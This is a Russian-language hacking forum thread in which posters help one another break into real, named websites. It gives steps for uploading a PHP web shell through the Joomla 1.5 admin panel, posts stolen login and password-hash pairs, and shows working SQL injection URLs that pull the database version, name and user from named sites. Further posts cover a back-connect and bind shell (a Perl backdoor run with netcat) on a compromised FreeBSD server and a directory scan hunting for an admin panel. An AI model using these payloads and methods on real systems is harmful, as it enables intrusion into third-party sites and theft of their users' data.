Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
Ищешь настройки,дописываешь php в разрешенный формат.Идешь в медиа-менеджер и льешь шелл в нужную тебе папку,насколько я понмню (лил давно как раз в 1.5) шелл будет в папке /images .
Привет! Попался мне тут портальчик на португальском языке и есть табличка с полями*значениями usr_frase*usr_senha: 606715696665bada*3f886c5806f6861b 606715696665bada*672e2ebf3645a3bc 606715696665bada*3f886c5806f6861b 606717496665bcba*2d793cff37fd171b Это, как я понял пары логин*пароль. Причём первая часть неизменна у разных пользователей (за редким исключением), а вторая меняется. Есть у кого мысли как расшифровать? UPD. Гугл сказал, что первая часть попадается тут: http://emsmat.sev.gob.mx/claves.php
установить модуль и тупо льешь туда шелл... либо извращаешся и устанавливаешь джумла ксплорер..а через него уже и шелла не надо..
Не могу вывести database(), кто может объяснить в чем дело? http://www.musicandmeaning.net/issues/showArticle.php?artID=-5.7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Code: http://www.musicandmeaning.net/fora/view_post.php?postid=2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7+limit+1,1--+
есть шелл на системе freebsd 7.2, нужен бекконект дальше /usr/local/www не пускает -"Can't open this folder!" Помогите пожалуйста
какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти. Или просто netcat-ом, если доступен в консоли https://forum.antichat.net/thread200753.html И сам сплойт необязательно запускать из /tmp и вообще поюзай поиск по сайту, всё тут есть
права на папку с которой запускаю бк drwxrwxrwx бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции Скажи как, а то я почти не знаю неткат-а ПС Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к / ППС мб фаервол мешает?
а как ты делаешь бекконнект? без нетката то? какой утилитой пользуешся? http://uasc.org.ua/files/backdoor.pl.txt вот тебе перловый биндшелл..меня много раз спасал когда всо не срабатывал, на серванте в шелле пишешь perl bind.pl у себя запускаешь неткат и пишешЬ nc 127.0.0.1 31337 вместо локалхоста пишешь айпишник серванта...
у себя то я знаю как использовать неткат, но как неткат-ом с одного серва коннектится к другому - не знаю.. спс за бинд, но perl bind.pl ничего не происходит, как юзать perl bind.pl ip port? ili perl bind.pl ip ?
Есть pass админа, но админку не могу найти.Сайта про Майкла Джексона. » http://www.jacksonaction.com/images/ HTTP 403 Forbidden » http://www.jacksonaction.com/temp/ HTTP 403 Forbidden » http://www.jacksonaction.com/_private/ HTTP 403 Forbidden » http://www.jacksonaction.com/~root HTTP 403 Forbidden » http://www.jacksonaction.com/~nobody HTTP 403 Forbidden » http://www.jacksonaction.com/2009/ HTTP 200 OK » http://www.jacksonaction.com/bad/ HTTP 200 OK » http://www.jacksonaction.com/history/ HTTP 200 OK » http://www.jacksonaction.com/icons/ HTTP 200 OK » http://www.jacksonaction.com/index.php HTTP 200 OK » http://www.jacksonaction.com/search.php HTTP 200 OK » http://www.jacksonaction.com/temp/ HTTP 403 Forbidden » http://www.jacksonaction.com/text/ HTTP 403 Forbidden • Possible engine => FrontPage: » http://www.jacksonaction.com/_vti_bin/ HTTP 403 Forbidden » http://www.jacksonaction.com/_vti_bin/_vti_aut/ HTTP 401 Authorization Required » http://www.jacksonaction.com/_vti_cnf/ HTTP 403 Forbidden » http://www.jacksonaction.com/_vti_log/ HTTP 403 Forbidden » http://www.jacksonaction.com/_vti_pvt/ HTTP 403 Forbidden » http://www.jacksonaction.com/_vti_txt/ HTTP 403 Forbidden
